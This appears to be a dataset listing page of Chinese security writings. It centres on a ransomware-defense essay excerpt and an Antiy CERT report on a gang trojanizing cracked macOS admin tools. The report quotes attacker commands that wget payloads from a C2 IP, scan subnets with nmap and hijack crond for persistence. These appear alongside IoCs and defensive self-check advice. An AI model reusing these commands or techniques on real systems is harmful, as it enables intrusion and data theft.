在主机的安全防御体系中,将主机环境塑造、恶意代码查杀、主动监测、介质管控、主机防火墙等大量的安全功能进行积木化的整合,实现按需弹性部署,从而在面对钓鱼投放、漏洞突防、恶意介质插入等攻击方式时,能够在主机侧形成包括主机边界防护、对象检测、行为管控、敏感数据保护的微观防御纵深,切实构建主机系统安全层面防御基石。 6.6 以执行体治理为核心抓手持续闭环运营 网空对抗的主要范式,在过去和未来非常长的一个阶段,都是运行对抗。运行是数据基于执行入口向指令转化的过程,运行的依赖条件是防御的关键机会。同时我们必须看到,信息系统以计算能力承载执行体运行,完成其功能和任务的基本模式不会改变;信息系统依赖数据输入输出的运行方式不会改变;威胁行为体持续编写生产恶意执行体的客观事实不会改变。执行体既是网空对抗中的攻击目标,也是“武器化”攻击装备,同时也是防御机制的承载者。所有具备可执行能力、有机会转化为指令的对象,都可归入执行体范畴,从系统IO层面,执行体是最小可治理单元。 绝大部分攻击战术动作依赖执行体完成,攻击者持续侵入可信链,盗用证书加白、供应链污染等攻击手法愈发常见。大量的混合执行体攻击打破了传统的“威胁检测+可信签名”的防御检测范式。攻击者更注重利用系统环境中已经存在的可利用执行对象(如系统shell),并将大量开源和商用正常工具作为实现攻击的路径和工具。这些开源和商用软件在政企机构中有着广泛应用,有的软件本身就带有合法甚至知名机构赋予的信誉,这就使我们面向执行体对象的识别颗粒度要至少到达每一个活跃和新增对象,最小化地缩窄执行入口,最大化地管控系统。这些工作既需要强大的共性能力赋能,也需要每一个关键基础设施和重要信息系统去建立自己的执行体治理基线和闭环运营机制。当然,这些工作离不开能支撑执行体治理的、有效的主机安全防护软件。 以执行体对象为核心抓手开展防御治理工作,对网络安全基本能力具有重要价值意义。在识别环节,可以掌握执行体的行为与业务之间的支撑关系,理解执行体及其所需权限,掌握执行体具备的能力及其与脆弱性、暴露面的对应关系;在塑造环节,可以管控执行体开放服务及存在执行更新能力的通道;在防护环节,可以识别 执行体的资源访问、连接、创建、写入、执行的客体,判断其行为目的,对违规行为进行拒止;在检测环节,可以基于执行体分布和行为监测,筛选出值得关注的、未知的执行体;在响应环节,可以基于执行体的潜在和激活能力、创建信道等手段,支撑追溯攻击来源等。 执行体治理是网络安全运营者通过识别和管控执行体保障网络安全的持续过程。持续过程不仅要完成检测、防御、清除恶意执行体和控制非恶意执行体网络访问等基础防护,更要建立识别、塑造、检测、防御和响应的流程闭环。在流程运行闭环的基础上,全面掌握执行体的静态分布情况与业务应用的执行体构成,建立信誉清单,同时能够识别执行体的执行动作并依据基线进行控制。在基线建立之后,识别全部执行体,全面掌握执行体和执行体的行为与业务之间的支撑关系,建立信誉指标、行为指标、业务影响指标等量化指标,以指标为指引针对不同场景建立配套的管控规则库、基线库和模型库,并持续运营实现能力与时俱进、效能不断提升。从而保持防御主动,构建防御能力对攻击者的不确定和不可预测性,提升攻击绕过难度,束控攻击活动,降低失陷风险。 6.7 坚持构建动态、综合的防御体系而不是始终摇摆 不断出现的各类重大安全威胁事件,容易产生类似最应重点防范勒索攻击还是APT攻击一类的疑惑。从水平上看,少数勒索攻击的前导攻击部分的水平,已经接近高级网空威胁行为体的APT攻击水准,而且勒索攻击将比APT攻击带来更直接和快速的经济损失与显性的机构信誉影响。定向勒索攻击确实是APT能力+勒索行为的结合体。但从另一角度看,由于勒索攻击组织必然要在一个相对短周期获益,其并无APT攻击者那样必须突破中心目标的关键意志力,其在长期潜伏、持久化和隐蔽作业方面,不会表现出APT攻击者的战略耐心。所以对每一个政企机构来说,其资产人员暴露面,一方面必然同时面对者多种攻击组织,但其可能遭遇的最高烈度或水平的攻击的判断,需要基于将其综合业务资产价值放到复杂的社会安全和地缘安全的背景下进行想定判断。 但必须指出的是,对大量机构来说,目前存在的并非在防御重点是APT攻击还是勒索攻击的选择问题,而是尚未完成防御基本面建设的问题。针对各种复杂的组合攻击,都需要防御层次的展开,都不存在“一招鲜,吃遍天”,所有资源、人力、策略投入的弹性调整,其前提都是已经完成了防御基础能力建设的基本动作,基本形成了动态综合、有效闭环的防御体系。这才能做到针对威胁变化实施针对性布防。可以说防御体系如能有效防御APT攻击,那么也能有效防御定向勒索攻击。 面对威胁挑战。战术上的高度重视和战略上坚定信心都是重要的。我们要坚信虽然定向勒索攻击防范难度很大,但依然有系统化的方法的和落地抓手。针对体系性的攻击,必须坚持关口前移,向前部署,构成纵深,闭环运营。提升攻击者火力侦察和进展到外围地带的发现能力,降低攻击方进入到核心地带的可能性。提升网络和资产可管理性是工作的基础:主动塑造和加固安全环境、强化暴露面和可攻击面的约束和管理、强化对供应链上游入口的管控、启动全面的日志审计分析和监测运行。构建从拓扑到系统侧的防御纵深,针对攻击者探测、投放、漏洞利用、代码运行、持久化、横向移动等行为展开层层设防,特别要建设好主机系统侧防护,将其作为最后一道防线和防御基石,构建围绕执行体识别管控的细粒度治理能力。最终通过基于防御体系实现感知、干扰、阻断定向攻击杀伤链的实战运行效果。
blog
“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析 1.概述 近期,安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡,进行横向渗透的攻击活动。 此下载站目前可下载数十个破解软件,其中五款运维工具包含恶意文件,这五款运维工具集中在服务运维工具分类中,安天CERT判断该事件针对的目标为国内IT运维人员。当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站,如果下载执行了含有恶意文件的运维工具,那么恶意文件会连接攻击者服务器下载并执行远控木马,攻击者可通过此远控木马窃取主机中的数据和文件,确定受害者及所在单位的信息,为后续横向渗透做准备。 安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:攻击者使用远程控制的方式窃取了受害者macOS操作系统主机中的文件;下载并使用fscan、nmap等工具对受害者的内网进行扫描,以获取内网更多服务器和主机的信息;利用口令破解、漏洞利用等渗透手段尝试获取更多服务器和主机的系统权限,横向渗透成功后在服务器上部署并运行hellobot后门。在此次行动中,虽然攻击者的横向渗透水平相对较弱,但是依然成功获取了服务器的系统权限。入侵成功后可能导致数据被窃、信息泄露、被长期监视等安全风险。 安天CERT的分析人员在搜索站搜索“Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查。 该黑产团伙采用供应链投毒、伪造官方软件网站、以及利用破解软件等多种方式传播恶意程序,主要攻击目标是IT运维人员,攻击范围涵盖了Windows、Linux以及macOS等操作系统。此外,该团伙使用经过精心构造的域名,并对下载的载荷文件进行混淆处理,以规避安全产品的检测,因此安天CERT用“暗蚊”组织命名该团伙。 在即将发布该报告时,安天CERT关联到了近期深信服披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》[1],发现此次事件攻击活动中攻击者可能与友商披露的攻击者为同一批团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。 2.详细情况 2.1 监测情况 安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件,连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。 SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件: 从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查,详细自查方法请参考本报告第六小节。 被植入恶意文件的运维工具相关信息: 文件名:SecureCRT.dmg MD5:94E0EE6189DF1DAD0EFB01374D67815C 被植入恶意文件名:libpng.dylib 下载量:6094 文件名:ultraedit.dmg MD5:3FF4C5A86CE6A35B6D9A49478BD1058D 被植入恶意文件名:libConfigurer64.dylib 下载量:6716 文件名:Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg MD5:81F75533298736A23597A34B505209B5 被植入恶意文件名:libpng.dylib 下载量:1507 文件名:FinalShell_MacYY.dmg MD5:808B17A47A91421F50AF04A865DE26C7 被植入恶意文件名:libpng.dylib 下载量:824 文件名:navicat161_premium_cs.dmg MD5:B74301CB51FB165F1ED8F2676A39FBBF 被植入恶意文件名:libpng.dylib 下载量:16188 当运维人员寻找macOS平台下免费的运维工具时被引流到该下载站,并从中下载执行含有恶意文件的运维工具。恶意文件会连接C2下载远控执行。攻击者在构造恶意域名时,针对不同运维工具采用不同域名且字符串与对应的运维工具文件名相关,从而增加通信隐蔽性。 文件名:SecureCRT.dmg 恶意域名:download.securecrt.vip 文件名:ultraedit.dmg 恶意域名:download.ultraedit.info 文件名:Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg 恶意域名:download. rdesktophub.com 文件名:FinalShell_MacYY.dmg 恶意域名:download.finallshell.cc 文件名:navicat161_premium_cs.dmg 恶意域名:download.Macnavicat.com 2.2 攻击活动的时间线 攻击者从2023年3月份便着手开始策划此次攻击活动,其最早开始于3月20日注册了其所使用部分的C2域名,在3月至7月期间攻击者陆续注册了此次攻击活动中所涉及的10个C2域名,并在期间攻击者将使用的部分载荷上传至VT测试其免杀效果。最后攻击者在9月19日和20日将被植入恶意文件的五款运维工具上传至该下载站。 3.攻击流程 被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马,该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。 3.1 初始访问攻击 由于攻击者在这五款运维工具中所采用的攻击方式一样,初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后,软件加载被植入的恶意文件libpng.dylib,连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马,该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力;libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器,该加载器会将自身添加至开机启动项中,以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到,故无法分析其最终落地载荷。 3.2 内网横向移动流程 安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段: 步骤1:远控下载反向Shell工具 在受害者macOS操作系统主机中成功植入Khepri远控木马后,攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马,该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下: wget http://159.75.xxx.xxx:443/mac2 步骤2:文件窃取和分析 攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析,为进一步的横向移动做准备。 步骤3:内网网络扫描 攻击者下载了fscan、nmap等扫描工具,并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外,攻击者还利用fscan扫描工具对内网进行了扫描,以获取内网更多服务器和主机的信息,包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示: nmap -Pn -p22 -oG - 172.xx.xx.xxx/24 步骤4:使用多种渗透手段: 攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下: ssh xxxxx@172.xx.xx.xxx 步骤5:部署后门进行持久化 攻击者会访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门,该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件命令如下所示: wget http://159.75.xxx.xxx:8088/centos7 尽管在此次行动中,攻击者的横向移动整体水平相对较弱,然而并不能忽略其所带来的危害。即使攻击者横向移动能力有限,但仍能通过成功植入恶意软件、利用漏洞和暴力破解等手段,对受害者的系统和数据造成严重的损害。这种攻击形式可能导致敏感信息泄露、系统崩溃、服务中断以及进一步的攻击扩散,对受害者的隐私和安全构成潜在风险。因此,需认真对待这些攻击,并采取适当的安全措施来保护系统和数据免受威胁。 4.关联分析 经关联分析发现,“暗蚊”黑产团伙可能与近期友商披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》中的攻击者为同一团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。 1. 本次事件针对IT运维人员,且工具名称和使用的域名相似 攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat,都是IT运维人员日常使用频次较高的软件工具,且都被归于该网站的“服务器运维”类别中,表明攻击者有针对性地对IT运维人员进行攻击。 此外,攻击者在本次攻击活动中用于托管恶意载荷的域名,形式上也与攻击者在此前攻击活动中使用的相似。 2. 使用crond服务持久化和后门动态链接库手法与友商披露类似 本次攻击活动中攻击者在内网Linux机器上访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。 3. 最终载荷使用的恶意域名amdc6766.net相同 在本次攻击活动中,攻击者在内网Linux机器上使用的最终载荷为hellobot后门,其外联域名为Microsoft.amdc6766.net,与友商分析报告中披露的恶意域名相同。 5.样本详细分析 5.1 破解版SecureCRT软件分析 由于攻击者在这五款运维工具中所采用的攻击方式一样,样本详细分析以破解版的SecureCRT软件分析为例。 注:可在计算机病毒分类命名百科全书Virusview.net,搜索“DarkMozzie”查看更多该病毒家族相关信息。 SecureCRT是VanDyke Software公司开发的一个商业SSH、Telnet客户端和虚拟终端软件。本次攻击活动破解版SecureCRT软件相较于官网提供的SecureCRT,在Frameworks文件夹中多出一个名为“libpng.dylib”的动态库文件。 破解版SecureCRT的主Mach-O文件运行时会对该动态库文件libpng.dylib进行加载。 5.1.1 libpng.dylib文件分析 libpng.dylib从硬编码的URL处获取下一阶段载荷文件,解码后保存至指定的路径中执行。 6.安全建议 针对以“暗蚊”为代表的黑产团伙,以IT运营者使用远程访问、编辑器、数据库管理等免费或破解版运维工具作为突破口投放攻击载荷,通过网内横向移动,进一步收集信息并维持持久化,最终窃取主机中的数据和文件的攻击模式,安天CERT建议: 6.1 开展针对性自查 1、对于使用苹果操作系统的IT运营者 (1)确认是否曾在MACYY或其它网站中下载以下运维工具并核对破解软件的MD5:远程访问(SecureCRT、FinalShell 、Microsoft Remote Desktop)、编辑器(UltraEdit)、数据库管理(Navicat Premium); (2)检查/tmp/目录中是否存在.test、.fseventsds文件,/Users/Shared/目录中是否存在.fseventsd文件,并检查.fseventsd文件是否被设置为开机启动项。 2、对于使用Linux操作系统的IT运营者 (1)检查/usr/sbin/cron(或crond)文件近期是否被改动; (2)检查/usr/sbin/cron(或crond)文件所依赖的动态链接库中是否存在libdb.so.2文件; (3)检查libdb.so.2文件是否存在问题:检查MD5是否为F23ED5D991CF0C8AA8378774E8FA93FE,或者检查libdb.so.2文件的改动时间是否与/usr/sbin/cron(或crond)文件的改动时间相近。 6.2 增强正版软件使用意识 建议IT运营者(尤其是使用苹果操作系统的IT运营者)从官方地址下载常用运维工具,以破解为代表的免费下载站极大可能存在供应链污染,尤其不要相信“苹果操作系统上不会存在病毒”的伪科普。更重要的是,由于IT运营者在使用苹果设备时极大可能不会经常关机,以致“暗蚊”黑产团伙通过远控并持续窃密留下了可乘之机。 6.3 加强主机侧安全防护 建议IT运营者部署企业级终端防御系统,加强针对“暗蚊”黑产团伙在内网横向移动环节的防护,可以从端点暴破、横向移动、新增文件、修改配置等多个环节进行全链路的检测,根据不同的攻击阶段对其行为进行溯源分析,第一时间感知威胁,并进行清除,深度还原攻击路径,为固证取证提供有力的支持。 6.4 提升网络威胁监测与响应 建议IT运营者部署网络威胁检测与响应系统(NTA或NDR)可以结合“暗蚊”相关信标进行告警。
blog
"波音遭遇勒索攻击事件分析复盘——定向勒索的威胁趋势分析与防御思考\n(...TRUNCATED)
blog
"\nMirai僵尸网络变种“Aquabot“分析\n\n\n1.概述\n近期,安天CERT捕获到一个Mirai(...TRUNCATED)
blog
"\n“X象”组织针对我国科研机构的钓鱼攻击事件分析\n\n1.概述\n2023年下半年(...TRUNCATED)
blog
"PLC与工控系统安全自动化技术及应用\n随着 PLC(可编程控制器) 产品的不(...TRUNCATED)
book
"内生安全:新一代网络安全框架体系与实践\n序\n随着数字经济时代的到来(...TRUNCATED)
book
"工业4.0实战-装备制造业数字化之道\n愿景篇\nNX\nNX是西门子工业软件公司提(...TRUNCATED)
book
README.md exists but content is empty. Use the Edit dataset card button to edit it.
Downloads last month
0
Edit dataset card